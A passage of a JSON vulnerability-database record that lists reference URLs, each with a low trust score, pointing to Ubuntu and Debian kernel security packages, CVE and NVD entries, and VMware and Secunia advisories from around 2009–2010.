        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1386"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3547"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3286"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3080"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-4567"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0001"
      },
      {
        "trust": 0.1,
        "url": "http://bit.ly/aqtcqn"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-4567"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2908"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1013127"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1377"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2409"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4536"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3620"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/security"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3228"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4021"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1387"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0427"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0426"
      },
      {
        "trust": 0.1,
        "url": "http://kb.vmware.com/kb/1055"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3621"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2006-6304"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3939"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4020"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3736"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2695"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1378"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3621"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0097"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4537"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/security_response.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0290"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3547"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3286"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3612"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3613"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4138"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4272"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0382"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1384"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4355"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4141"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2908"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3613"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0590"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3620"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3726"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-6304"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2910"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3556"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3612"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1379"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4212"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-4537"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3889"
      },
      {
        "trust": 0.1,
        "url": "http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-2910"
      },
      {
        "trust": 0.1,
        "url": "http://www.vmware.com/support/policies/eos_vi.html"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-3563"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3228"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/linus/ea30e11970a96cfe5e32c03a29332554573b4a10"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/business_solutions/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/35265/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny1_s390.deb"
      },
      {
